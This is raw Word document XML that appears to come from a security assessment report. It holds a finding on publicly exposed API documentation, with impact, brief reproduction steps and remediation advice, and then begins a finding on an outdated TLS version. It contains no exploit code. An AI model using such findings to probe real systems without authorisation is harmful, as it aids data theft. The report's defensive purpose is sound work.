        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="177B32E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4A97465" w14:textId="4F5CDDE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CD93A3F" w14:textId="73F4B322">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2CE50155" w14:textId="55528FC6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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35924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="2F1E8B0D" w14:textId="38367EB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5924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="1B72B526" w14:textId="7F45A34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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70C0F598">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PI documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="35924CB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EA982AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is publi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EA982AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cly </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EA982AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1EA982AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4752103C">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1EA982AD">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attackers to view what API calls can be made</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F26EE61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when going to the HTTP page. Attackers can abuse this to be able to learn what API calls are possible and how to execute API calls</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7F025F29">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5F26EE61">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as being able to read internal files on the host server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="219C6278" w14:textId="39C857D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5924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="75A7EBAE" w14:textId="55B3C25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5721C2F" w:rsidP="0D325B6E" w:rsidRDefault="75721C2F" w14:paraId="2E8EE279" w14:textId="1FBE51E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API documentation be</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ing publicly e</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 xml:space="preserve">xposed allows </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C7A9B54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attackers</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 xml:space="preserve"> to view what API calls can be made and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="513DF272">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">potentially </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retrieve internal documents and files</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D429584">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. These API calls can then </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 xml:space="preserve">be used to </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exfiltrate</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 xml:space="preserve"> data and gain sensitive information</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7AA56231">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5721C2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as personal information or network credentials. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4B59F866" w14:textId="7EC06531">
      <w:pPr>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35924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="0DB6E340" w14:textId="62961C5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35924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="536BD9CD" w14:textId="6A6EE50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65B5B667">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Go to the HTTP webpage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65B5B667" w:rsidP="0D325B6E" w:rsidRDefault="65B5B667" w14:paraId="487416F3" w14:textId="5FE19E4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5B5B667">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Go to the following </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65B5B667">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r w:rsidRPr="0D325B6E" w:rsidR="65B5B667">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the API documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="55B1DD09" w14:textId="678ABDD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35924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="05CD8D63" w14:textId="422BA7F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730E1A32" w:rsidP="0D325B6E" w:rsidRDefault="730E1A32" w14:paraId="24AFBE08" w14:textId="0A40ED4F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:hanging="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30E1A32">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30E1A32">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3411A07C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the fol</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3411A07C">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3411A07C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>owin</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3411A07C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="29D74D53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C4FBCEC" w:rsidP="0D325B6E" w:rsidRDefault="5C4FBCEC" w14:paraId="2E9BA81C" w14:textId="200AED56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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4FBCEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove or </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C4FBCEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relocate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C4FBCEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> API documentation if </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12CF410A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">it is not </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12CF410A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12CF410A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be public knowledge for all APT users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C4FBCEC" w:rsidP="0D325B6E" w:rsidRDefault="5C4FBCEC" w14:paraId="208823DB" w14:textId="4ED416E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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C4FBCEC">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authentication on API documentation endpoints to ensure that only </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3A64D3F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authorized users can access documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C286E5A">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50F21D59" w14:textId="1A970CED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:hanging="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35924CB5" w:rsidP="0D325B6E" w:rsidRDefault="35924CB5" w14:paraId="7BD3A64C" w14:textId="66E7FB82">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5924CB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7ECA76A1" w:rsidP="0D325B6E" w:rsidRDefault="7ECA76A1" w14:paraId="184F5D1C" w14:textId="159A07E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Reb1c7d40d597449d">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="7ECA76A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve">Speakeasy - Exposing your API </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6A18396F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>publicly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A18396F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="07C813A0" w14:textId="75A3AD73">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B84C052" w14:textId="78AB11F0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="13341924" w:rsidP="0D325B6E" w:rsidRDefault="13341924" w14:paraId="5BE40AB6" w14:textId="14F32056">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc137870349" w:id="716064118"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13341924">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13341924">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1935383060" w:id="336586717"/>
      <w:bookmarkStart w:name="_Toc46739483" w:id="256641952"/>
      <w:bookmarkStart w:name="_Toc991165824" w:id="150330034"/>
      <w:bookmarkStart w:name="_Toc653149189" w:id="1574779847"/>
      <w:bookmarkStart w:name="_Toc457422000" w:id="1811732425"/>
      <w:bookmarkStart w:name="_Toc110038265" w:id="1786763934"/>
      <w:bookmarkStart w:name="_Toc1904922564" w:id="1332250437"/>
      <w:bookmarkStart w:name="_Toc971551382" w:id="157050958"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="56CCB454">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outdated TLS Version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336586717"/>
      <w:bookmarkEnd w:id="256641952"/>
      <w:bookmarkEnd w:id="150330034"/>
      <w:bookmarkEnd w:id="1574779847"/>
      <w:bookmarkEnd w:id="1811732425"/>
      <w:bookmarkEnd w:id="1786763934"/>
      <w:bookmarkEnd w:id="1332250437"/>
      <w:bookmarkEnd w:id="157050958"/>
      <w:bookmarkEnd w:id="716064118"/>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2C42AFF1">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119C15A" w14:textId="7871627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1E14EA8" w14:textId="1FFBC55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AC32456" w14:textId="677D672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4821AEBB">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4898C35" w14:textId="2B5AB96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5E209809" w14:textId="7EA8683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606300E1" w14:textId="549B744C">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AE93FE4" w14:textId="7DEE179C">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7E4496E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677CB8" w14:textId="4954B0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866F035" w14:textId="50BD8766">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High</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22F9B3F0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="732E4CFC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4FE4753F">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CBE0830" w14:textId="5905B77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33FDDDA" w14:textId="0758BD2C">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3F6ED7C3">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9C8FB2" w14:textId="04360AD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86E1FC6" w:rsidP="0D325B6E" w:rsidRDefault="386E1FC6" w14:paraId="2CBE2EB2" w14:textId="7666167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386E1FC6">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F096908" w:rsidP="0D325B6E" w:rsidRDefault="6F096908" w14:paraId="5B55D3F6" w14:textId="0E33FA2B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R16c75b69fd864025">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6F096908">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>T1562-010</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="12A86E74">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
